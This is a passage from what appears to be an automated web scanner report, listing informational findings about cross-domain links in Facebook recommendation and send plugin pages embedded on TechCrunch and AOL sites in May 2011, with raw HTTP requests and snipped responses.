  • http://techcrunch.com/2011/05/02/twitter-to-buy-tweetdeck-for-40-million-50-million/
  • http://techcrunch.com/2011/05/03/ballmer-developers-rap/
  • http://techcrunch.com/2011/05/03/bill-gates-nuclear/
  • http://techcrunch.com/2011/05/03/google-dissolves-search-group-internally-now-called-knowledge/
  • http://techcrunch.com/2011/05/03/obama-situation-room-photo-is-already-half-way-to-becoming-flickrs-most-viewed-pic/
  • http://techcrunch.com/2011/05/03/stipple/
  • http://techcrunch.com/2011/05/04/viber-to-release-free-calling-messaging-app-for-android-this-week/
  • http://www.crunchbase.com/assets/images/resized/0002/1352/21352v7-max-250x250.png
  • http://www.crunchbase.com/assets/images/resized/0002/9578/29578v31-max-250x250.png

Request

GET /plugins/recommendations.php?site=techcrunch.com&width=290&height=330&header=false&colorscheme=light&font=verdana&border_color=white HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://techcrunch.com/?icid=navbar_techcrunch_main5
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.136.102.116
X-Cnection: close
Date: Thu, 05 May 2011 02:00:31 GMT
Content-Length: 12749

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
</title>
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yD/r/rZiaNe7iEDZ.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yX/r/AZ23fTP8PUp.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js"></script>
...[SNIP]...
<div class="UIImageBlock clearfix pas fbRecommendation RES_70ff0a68962dbaaf"><a class="fbImageContainer fbMonitor UIImageBlock_Image UIImageBlock_SMALL_Image" href="http://techcrunch.com/2011/05/04/viber-to-release-free-calling-messaging-app-for-android-this-week/" title="Viber To Release Free Calling, Messaging App For Android This..Week" target="_top"><img class="img" src="http://tctechcrunch.files.wordpress.com/2011/05/viber-android.png" /></a>
...[SNIP]...
<strong><a class="fbMonitor" href="http://techcrunch.com/2011/05/04/viber-to-release-free-calling-messaging-app-for-android-this-week/" target="_top">Viber To Release Free Calling, Messaging App For Android This..Week</a>
...[SNIP]...
<div class="UIImageBlock clearfix pas fbRecommendation RES_140b988697baad55"><a class="fbImageContainer fbMonitor UIImageBlock_Image UIImageBlock_SMALL_Image" href="http://techcrunch.com/2011/05/03/ballmer-developers-rap/" title="Developers, The Rap (Featuring Steve Ballmer,..Naturally)" target="_top"><img class="img" src="http://tctechcrunch.files.wordpress.com/2011/05/screen-shot-2011-05-03-at-5-12-02-pm.png" /></a>
...[SNIP]...
<strong><a class="fbMonitor" href="http://techcrunch.com/2011/05/03/ballmer-developers-rap/" target="_top">Developers, The Rap (Featuring Steve Ballmer,..Naturally)</a>
...[SNIP]...
<div class="UIImageBlock clearfix pas fbRecommendation RES_381d13808c9d322c"><a class="fbImageContainer fbMonitor UIImageBlock_Image UIImageBlock_SMALL_Image" href="http://techcrunch.com/2011/05/03/obama-situation-room-photo-is-already-half-way-to-becoming-flickrs-most-viewed-pic/" title="Obama ...Situation Room... Photo Is Already Half Way To Becoming Flickr...s Most Viewed..Pic" target="_top"><img class="img" src="http://tctechcrunch.files.wordpress.com/2011/05/screen-shot-2011-05-03-at-10-35-12-pm1.png" /></a>
...[SNIP]...
<strong><a class="fbMonitor" href="http://techcrunch.com/2011/05/03/obama-situation-room-photo-is-already-half-way-to-becoming-flickrs-most-viewed-pic/" target="_top">Obama ...Situation Room... Photo Is Already Half Way To Becoming Flickr...s Most Viewed..Pic</a>
...[SNIP]...
<div class="UIImageBlock clearfix pas fbRecommendation RES_4881d9648d4cbfba"><a class="fbImageContainer fbMonitor UIImageBlock_Image UIImageBlock_SMALL_Image" href="http://techcrunch.com/2011/05/03/bill-gates-nuclear/" title="Bill Gates On Nuclear Energy: Compared To Coal, It Is Still Safer In Terms Of People ...Killed Per Kil" target="_top"><img class="img" src="http://tctechcrunch.files.wordpress.com/2011/05/bill-gates-wired.jpg" /></a>
...[SNIP]...
<strong><a class="fbMonitor" href="http://techcrunch.com/2011/05/03/bill-gates-nuclear/" target="_top">Bill Gates On Nuclear Energy: Compared To Coal, It Is Still Safer In Terms Of People ...Killed Per Kil</a>
...[SNIP]...
<div class="UIImageBlock clearfix pas fbRecommendation RES_3d4d1489a2ca3395"><a class="fbImageContainer fbMonitor UIImageBlock_Image UIImageBlock_SMALL_Image" href="http://techcrunch.com/2011/05/02/twitter-to-buy-tweetdeck-for-40-million-50-million/" title="Twitter To Buy TweetDeck For $40 Million ... $50..Million" target="_top"><img class="img" src="http://www.crunchbase.com/assets/images/resized/0002/1352/21352v7-max-250x250.png" /></a>
...[SNIP]...
<strong><a class="fbMonitor" href="http://techcrunch.com/2011/05/02/twitter-to-buy-tweetdeck-for-40-million-50-million/" target="_top">Twitter To Buy TweetDeck For $40 Million ... $50..Million</a>
...[SNIP]...
<div class="UIImageBlock clearfix pas fbRecommendation RES_4602fd64df6d2bed"><a class="fbImageContainer fbMonitor UIImageBlock_Image UIImageBlock_SMALL_Image" href="http://techcrunch.com/2011/05/03/google-dissolves-search-group-internally-now-called-knowledge/" title="Google Dissolves Search Group Internally, Now Called.....Knowledge..." target="_top"><img class="img" src="http://www.crunchbase.com/assets/images/resized/0002/9578/29578v31-max-250x250.png" /></a>
...[SNIP]...
<strong><a class="fbMonitor" href="http://techcrunch.com/2011/05/03/google-dissolves-search-group-internally-now-called-knowledge/" target="_top">Google Dissolves Search Group Internally, Now Called.....Knowledge...</a>
...[SNIP]...
<div class="UIImageBlock clearfix pas fbRecommendation RES_453ad205ae56e01"><a class="fbImageContainer fbMonitor UIImageBlock_Image UIImageBlock_SMALL_Image" href="http://techcrunch.com/2011/05/03/stipple/" title="Stipple Opens The Kimono To Reveal A Product Tagging Platform With Massive..Potential" target="_top"><img class="img" src="http://tctechcrunch.files.wordpress.com/2011/05/screen-shot-2011-05-03-at-2-29-35-am.png" /></a>
...[SNIP]...
<strong><a class="fbMonitor" href="http://techcrunch.com/2011/05/03/stipple/" target="_top">Stipple Opens The Kimono To Reveal A Product Tagging Platform With Massive..Potential</a>
...[SNIP]...
<a class="UIImageBlock_Image UIImageBlock_ICON_Image" target="_blank" href="http://developers.facebook.com/plugins/?footer=2" tabindex="-1"><img class="img" src="http://static.ak.fbcdn.net/rsrc.php/v1/yH/r/eIpbnVKI9lR.png" width="14" height="14" /></a>
...[SNIP]...

16.69. http://www.facebook.com/plugins/recommendations.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/recommendations.php

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.facebook.com/plugins/recommendations.php?site=techcrunch.com&width=290&height=330&header=false&colorscheme=light&font=verdana&border_color=white
The response contains the following links to other domains:
  • http://static.ak.fbcdn.net/rsrc.php/v1/yD/r/rZiaNe7iEDZ.css
  • http://static.ak.fbcdn.net/rsrc.php/v1/yH/r/eIpbnVKI9lR.png
  • http://static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js
  • http://static.ak.fbcdn.net/rsrc.php/v1/yX/r/AZ23fTP8PUp.css
  • http://tctechcrunch.files.wordpress.com/2010/08/facebook-logo.png
  • http://tctechcrunch.files.wordpress.com/2011/05/bill-gates-wired.jpg
  • http://tctechcrunch.files.wordpress.com/2011/05/flixster-picture.png
  • http://tctechcrunch.files.wordpress.com/2011/05/screen-shot-2011-05-03-at-10-35-12-pm1.png
  • http://tctechcrunch.files.wordpress.com/2011/05/screen-shot-2011-05-03-at-5-12-02-pm.png
  • http://tctechcrunch.files.wordpress.com/2011/05/viber-android.png
  • http://techcrunch.com/2011/05/03/ballmer-developers-rap/
  • http://techcrunch.com/2011/05/03/bill-gates-nuclear/
  • http://techcrunch.com/2011/05/03/obama-situation-room-photo-is-already-half-way-to-becoming-flickrs-most-viewed-pic/
  • http://techcrunch.com/2011/05/04/facebook-one-third-online-ads/
  • http://techcrunch.com/2011/05/04/tc-cribs-likealittle-lal/
  • http://techcrunch.com/2011/05/04/viber-to-release-free-calling-messaging-app-for-android-this-week/
  • http://techcrunch.com/2011/05/04/warner-bros-acquires-social-movie-site-flixster-and-rotten-tomatoes/
  • http://techcrunch.com/home/wpcom/public_html/wp-content/themes/vip/tctechcrunchimages/logos_small/techcrunch2.png

Request

GET /plugins/recommendations.php?site=techcrunch.com&width=290&height=330&header=false&colorscheme=light&font=verdana&border_color=white HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://techcrunch.com/?icid=navbar_techcrunch_main5
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.42.103.27
X-Cnection: close
Date: Thu, 05 May 2011 00:59:49 GMT
Content-Length: 12744

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
</title>
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yD/r/rZiaNe7iEDZ.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yX/r/AZ23fTP8PUp.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js"></script>
...[SNIP]...
<div class="UIImageBlock clearfix pas fbRecommendation RES_6948fd0ae148277b"><a class="fbImageContainer fbMonitor UIImageBlock_Image UIImageBlock_SMALL_Image" href="http://techcrunch.com/2011/05/04/viber-to-release-free-calling-messaging-app-for-android-this-week/" title="Viber To Release Free Calling, Messaging App For Android This..Week" target="_top"><img class="img" src="http://tctechcrunch.files.wordpress.com/2011/05/viber-android.png" /></a>
...[SNIP]...
<strong><a class="fbMonitor" href="http://techcrunch.com/2011/05/04/viber-to-release-free-calling-messaging-app-for-android-this-week/" target="_top">Viber To Release Free Calling, Messaging App For Android This..Week</a>
...[SNIP]...
<div class="UIImageBlock clearfix pas fbRecommendation RES_21aae4e2fbf8aff8"><a class="fbImageContainer fbMonitor UIImageBlock_Image UIImageBlock_SMALL_Image" href="http://techcrunch.com/2011/05/03/obama-situation-room-photo-is-already-half-way-to-becoming-flickrs-most-viewed-pic/" title="Obama ...Situation Room... Photo Is Already Half Way To Becoming Flickr...s Most Viewed..Pic" target="_top"><img class="img" src="http://tctechcrunch.files.wordpress.com/2011/05/screen-shot-2011-05-03-at-10-35-12-pm1.png" /></a>
...[SNIP]...
<strong><a class="fbMonitor" href="http://techcrunch.com/2011/05/03/obama-situation-room-photo-is-already-half-way-to-becoming-flickrs-most-viewed-pic/" target="_top">Obama ...Situation Room... Photo Is Already Half Way To Becoming Flickr...s Most Viewed..Pic</a>
...[SNIP]...
<div class="UIImageBlock clearfix pas fbRecommendation RES_1754a473181d31b1"><a class="fbImageContainer fbMonitor UIImageBlock_Image UIImageBlock_SMALL_Image" href="http://techcrunch.com/2011/05/04/warner-bros-acquires-social-movie-site-flixster-and-rotten-tomatoes/" title="Warner Bros. Acquires Social Movie Site Flixster (And Rotten..Tomatoes)" target="_top"><img class="img" src="http://tctechcrunch.files.wordpress.com/2011/05/flixster-picture.png" /></a>
...[SNIP]...
<strong><a class="fbMonitor" href="http://techcrunch.com/2011/05/04/warner-bros-acquires-social-movie-site-flixster-and-rotten-tomatoes/" target="_top">Warner Bros. Acquires Social Movie Site Flixster (And Rotten..Tomatoes)</a>
...[SNIP]...
<div class="UIImageBlock clearfix pas fbRecommendation RES_dbc6fe4e0df3081"><a class="fbImageContainer fbMonitor UIImageBlock_Image UIImageBlock_SMALL_Image" href="http://techcrunch.com/2011/05/03/ballmer-developers-rap/" title="Developers, The Rap (Featuring Steve Ballmer,..Naturally)" target="_top"><img class="img" src="http://tctechcrunch.files.wordpress.com/2011/05/screen-shot-2011-05-03-at-5-12-02-pm.png" /></a>
...[SNIP]...
<strong><a class="fbMonitor" href="http://techcrunch.com/2011/05/03/ballmer-developers-rap/" target="_top">Developers, The Rap (Featuring Steve Ballmer,..Naturally)</a>
...[SNIP]...
<div class="UIImageBlock clearfix pas fbRecommendation RES_3d3f4e334dfd0aab"><a class="fbImageContainer fbMonitor UIImageBlock_Image UIImageBlock_SMALL_Image" href="http://techcrunch.com/2011/05/04/facebook-one-third-online-ads/" title="comScore: Facebook Now Serves One Third Of Online Ads In..U.S." target="_top"><img class="img" src="http://tctechcrunch.files.wordpress.com/2010/08/facebook-logo.png" /></a>
...[SNIP]...
<strong><a class="fbMonitor" href="http://techcrunch.com/2011/05/04/facebook-one-third-online-ads/" target="_top">comScore: Facebook Now Serves One Third Of Online Ads In..U.S.</a>
...[SNIP]...
<div class="UIImageBlock clearfix pas fbRecommendation RES_51362e06fa29226e"><a class="fbImageContainer fbMonitor UIImageBlock_Image UIImageBlock_SMALL_Image" href="http://techcrunch.com/2011/05/03/bill-gates-nuclear/" title="Bill Gates On Nuclear Energy: Compared To Coal, It Is Still Safer In Terms Of People ...Killed Per Kil" target="_top"><img class="img" src="http://tctechcrunch.files.wordpress.com/2011/05/bill-gates-wired.jpg" /></a>
...[SNIP]...
<strong><a class="fbMonitor" href="http://techcrunch.com/2011/05/03/bill-gates-nuclear/" target="_top">Bill Gates On Nuclear Energy: Compared To Coal, It Is Still Safer In Terms Of People ...Killed Per Kil</a>
...[SNIP]...
<div class="UIImageBlock clearfix pas fbRecommendation RES_12412dd56d34d8fe"><a class="fbImageContainer fbMonitor UIImageBlock_Image UIImageBlock_SMALL_Image" href="http://techcrunch.com/2011/05/04/tc-cribs-likealittle-lal/" title="TC Cribs: The Sights And Smells Of LikeALittle...s Ridiculous Hacker..House" target="_top"><img class="img" src="http://techcrunch.com/home/wpcom/public_html/wp-content/themes/vip/tctechcrunchimages/logos_small/techcrunch2.png" /></a>
...[SNIP]...
<strong><a class="fbMonitor" href="http://techcrunch.com/2011/05/04/tc-cribs-likealittle-lal/" target="_top">TC Cribs: The Sights And Smells Of LikeALittle...s Ridiculous Hacker..House</a>
...[SNIP]...
<a class="UIImageBlock_Image UIImageBlock_ICON_Image" target="_blank" href="http://developers.facebook.com/plugins/?footer=2" tabindex="-1"><img class="img" src="http://static.ak.fbcdn.net/rsrc.php/v1/yH/r/eIpbnVKI9lR.png" width="14" height="14" /></a>
...[SNIP]...

16.70. http://www.facebook.com/plugins/recommendations.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/recommendations.php

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.facebook.com/plugins/recommendations.php?site=techcrunch.com&width=290&height=330&header=false&colorscheme=light&font=verdana&border_color=white
The response contains the following links to other domains:
  • http://static.ak.fbcdn.net/rsrc.php/v1/yD/r/rZiaNe7iEDZ.css
  • http://static.ak.fbcdn.net/rsrc.php/v1/yH/r/eIpbnVKI9lR.png
  • http://static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js
  • http://static.ak.fbcdn.net/rsrc.php/v1/yX/r/AZ23fTP8PUp.css
  • http://tctechcrunch.files.wordpress.com/2011/05/bill-gates-wired.jpg
  • http://tctechcrunch.files.wordpress.com/2011/05/screen-shot-2011-05-03-at-10-35-12-pm1.png
  • http://tctechcrunch.files.wordpress.com/2011/05/screen-shot-2011-05-03-at-2-29-35-am.png
  • http://tctechcrunch.files.wordpress.com/2011/05/screen-shot-2011-05-03-at-5-12-02-pm.png
  • http://tctechcrunch.files.wordpress.com/2011/05/tt.png
  • http://techcrunch.com/2011/05/02/twitter-to-buy-tweetdeck-for-40-million-50-million/
  • http://techcrunch.com/2011/05/03/ballmer-developers-rap/
  • http://techcrunch.com/2011/05/03/bill-gates-nuclear/
  • http://techcrunch.com/2011/05/03/google-dissolves-search-group-internally-now-called-knowledge/
  • http://techcrunch.com/2011/05/03/new-imacs/
  • http://techcrunch.com/2011/05/03/obama-situation-room-photo-is-already-half-way-to-becoming-flickrs-most-viewed-pic/
  • http://techcrunch.com/2011/05/03/stipple/
  • http://www.crunchbase.com/assets/images/resized/0002/1352/21352v7-max-250x250.png
  • http://www.crunchbase.com/assets/images/resized/0002/9578/29578v31-max-250x250.png

Request

GET /plugins/recommendations.php?site=techcrunch.com&width=290&height=330&header=false&colorscheme=light&font=verdana&border_color=white HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://techcrunch.com/?icid=navbar_techcrunch_main5
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.44.73
X-Cnection: close
Date: Thu, 05 May 2011 01:39:54 GMT
Content-Length: 12657

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
</title>
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yD/r/rZiaNe7iEDZ.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yX/r/AZ23fTP8PUp.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js"></script>
...[SNIP]...
<div class="UIImageBlock clearfix pas fbRecommendation RES_7ed243bf574ab41"><a class="fbImageContainer fbMonitor UIImageBlock_Image UIImageBlock_SMALL_Image" href="http://techcrunch.com/2011/05/03/ballmer-developers-rap/" title="Developers, The Rap (Featuring Steve Ballmer,..Naturally)" target="_top"><img class="img" src="http://tctechcrunch.files.wordpress.com/2011/05/screen-shot-2011-05-03-at-5-12-02-pm.png" /></a>
...[SNIP]...
<strong><a class="fbMonitor" href="http://techcrunch.com/2011/05/03/ballmer-developers-rap/" target="_top">Developers, The Rap (Featuring Steve Ballmer,..Naturally)</a>
...[SNIP]...
<div class="UIImageBlock clearfix pas fbRecommendation RES_5b6765d9ef82b9ae"><a class="fbImageContainer fbMonitor UIImageBlock_Image UIImageBlock_SMALL_Image" href="http://techcrunch.com/2011/05/03/bill-gates-nuclear/" title="Bill Gates On Nuclear Energy: Compared To Coal, It Is Still Safer In Terms Of People ...Killed Per Kil" target="_top"><img class="img" src="http://tctechcrunch.files.wordpress.com/2011/05/bill-gates-wired.jpg" /></a>
...[SNIP]...
<strong><a class="fbMonitor" href="http://techcrunch.com/2011/05/03/bill-gates-nuclear/" target="_top">Bill Gates On Nuclear Energy: Compared To Coal, It Is Still Safer In Terms Of People ...Killed Per Kil</a>
...[SNIP]...
<div class="UIImageBlock clearfix pas fbRecommendation RES_2bfbaf3dee533438"><a class="fbImageContainer fbMonitor UIImageBlock_Image UIImageBlock_SMALL_Image" href="http://techcrunch.com/2011/05/03/obama-situation-room-photo-is-already-half-way-to-becoming-flickrs-most-viewed-pic/" title="Obama ...Situation Room... Photo Is Already Half Way To Becoming Flickr...s Most Viewed..Pic" target="_top"><img class="img" src="http://tctechcrunch.files.wordpress.com/2011/05/screen-shot-2011-05-03-at-10-35-12-pm1.png" /></a>
...[SNIP]...
<strong><a class="fbMonitor" href="http://techcrunch.com/2011/05/03/obama-situation-room-photo-is-already-half-way-to-becoming-flickrs-most-viewed-pic/" target="_top">Obama ...Situation Room... Photo Is Already Half Way To Becoming Flickr...s Most Viewed..Pic</a>
...[SNIP]...
<div class="UIImageBlock clearfix pas fbRecommendation RES_2eaba834c0043581"><a class="fbImageContainer fbMonitor UIImageBlock_Image UIImageBlock_SMALL_Image" href="http://techcrunch.com/2011/05/02/twitter-to-buy-tweetdeck-for-40-million-50-million/" title="Twitter To Buy TweetDeck For $40 Million ... $50..Million" target="_top"><img class="img" src="http://www.crunchbase.com/assets/images/resized/0002/1352/21352v7-max-250x250.png" /></a>
...[SNIP]...
<strong><a class="fbMonitor" href="http://techcrunch.com/2011/05/02/twitter-to-buy-tweetdeck-for-40-million-50-million/" target="_top">Twitter To Buy TweetDeck For $40 Million ... $50..Million</a>
...[SNIP]...
<div class="UIImageBlock clearfix pas fbRecommendation RES_55e441d9bda32df9"><a class="fbImageContainer fbMonitor UIImageBlock_Image UIImageBlock_SMALL_Image" href="http://techcrunch.com/2011/05/03/google-dissolves-search-group-internally-now-called-knowledge/" title="Google Dissolves Search Group Internally, Now Called.....Knowledge..." target="_top"><img class="img" src="http://www.crunchbase.com/assets/images/resized/0002/9578/29578v31-max-250x250.png" /></a>
...[SNIP]...
<strong><a class="fbMonitor" href="http://techcrunch.com/2011/05/03/google-dissolves-search-group-internally-now-called-knowledge/" target="_top">Google Dissolves Search Group Internally, Now Called.....Knowledge...</a>
...[SNIP]...
<div class="UIImageBlock clearfix pas fbRecommendation RES_17b5119d382b6815"><a class="fbImageContainer fbMonitor UIImageBlock_Image UIImageBlock_SMALL_Image" href="http://techcrunch.com/2011/05/03/stipple/" title="Stipple Opens The Kimono To Reveal A Product Tagging Platform With Massive..Potential" target="_top"><img class="img" src="http://tctechcrunch.files.wordpress.com/2011/05/screen-shot-2011-05-03-at-2-29-35-am.png" /></a>
...[SNIP]...
<strong><a class="fbMonitor" href="http://techcrunch.com/2011/05/03/stipple/" target="_top">Stipple Opens The Kimono To Reveal A Product Tagging Platform With Massive..Potential</a>
...[SNIP]...
<div class="UIImageBlock clearfix pas fbRecommendation RES_76735abd6e084767"><a class="fbImageContainer fbMonitor UIImageBlock_Image UIImageBlock_SMALL_Image" href="http://techcrunch.com/2011/05/03/new-imacs/" title="With Big Graphics, HD Cameras, And Triple Monitor Support, iMacs Are More..Pro-Like" target="_top"><img class="img" src="http://tctechcrunch.files.wordpress.com/2011/05/tt.png" /></a>
...[SNIP]...
<strong><a class="fbMonitor" href="http://techcrunch.com/2011/05/03/new-imacs/" target="_top">With Big Graphics, HD Cameras, And Triple Monitor Support, iMacs Are More..Pro-Like</a>
...[SNIP]...
<a class="UIImageBlock_Image UIImageBlock_ICON_Image" target="_blank" href="http://developers.facebook.com/plugins/?footer=2" tabindex="-1"><img class="img" src="http://static.ak.fbcdn.net/rsrc.php/v1/yH/r/eIpbnVKI9lR.png" width="14" height="14" /></a>
...[SNIP]...

16.71. http://www.facebook.com/plugins/send.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/send.php

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.facebook.com/plugins/send.php?api_key=117854138246106&channel=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df243eec6a8%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ffeb4109d%26relation%3Dparent.parent%26transport%3Dpostmessage&colorscheme=light&href=http%3A%2F%2Faol.sportingnews.com%2Fnfl%2Fstory%2F2011-05-04%2Fathletes-like-rashard-mendenhall-are-finding-out-the-downside-of-twitter&locale=en_US&ref=story-185322&sdk=joey
The response contains the following links to other domains:
  • http://static.ak.fbcdn.net/rsrc.php/v1/yD/r/rZiaNe7iEDZ.css
  • http://static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js
  • http://static.ak.fbcdn.net/rsrc.php/v1/yX/r/AZ23fTP8PUp.css
  • http://static.ak.fbcdn.net/rsrc.php/v1/yn/r/hhXWj5xHnMP.css

Request

GET /plugins/send.php?api_key=117854138246106&channel=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df243eec6a8%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ffeb4109d%26relation%3Dparent.parent%26transport%3Dpostmessage&colorscheme=light&href=http%3A%2F%2Faol.sportingnews.com%2Fnfl%2Fstory%2F2011-05-04%2Fathletes-like-rashard-mendenhall-are-finding-out-the-downside-of-twitter&locale=en_US&ref=story-185322&sdk=joey HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/nfl/story/2011-05-04/athletes-like-rashard-mendenhall-are-finding-out-the-downside-of-twitter?icid=maing-grid7%7Cmain5%7Cdl4%7Csec1_lnk3%7C60545
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.42.121.75
X-Cnection: close
Date: Thu, 05 May 2011 00:58:07 GMT
Content-Length: 7571

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
</title>
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yX/r/AZ23fTP8PUp.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yD/r/rZiaNe7iEDZ.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yn/r/hhXWj5xHnMP.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js"></script>
...[SNIP]...

16.72. http://www.facebook.com/plugins/send.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/send.php

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.facebook.com/plugins/send.php?api_key=187288694643718&channel=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Dfca7ad0b8%26origin%3Dhttp%253A%252F%252Ftechcrunch.com%252Ff208209ea4%26relation%3Dparent.parent%26transport%3Dpostmessage&colorscheme=light&font=lucida+grande&href=http%3A%2F%2Ftechcrunch.com%2F2011%2F05%2F04%2Fmashery-funding-2%2F&locale=en_US&sdk=joey
The response contains the following links to other domains:
  • http://b.static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js
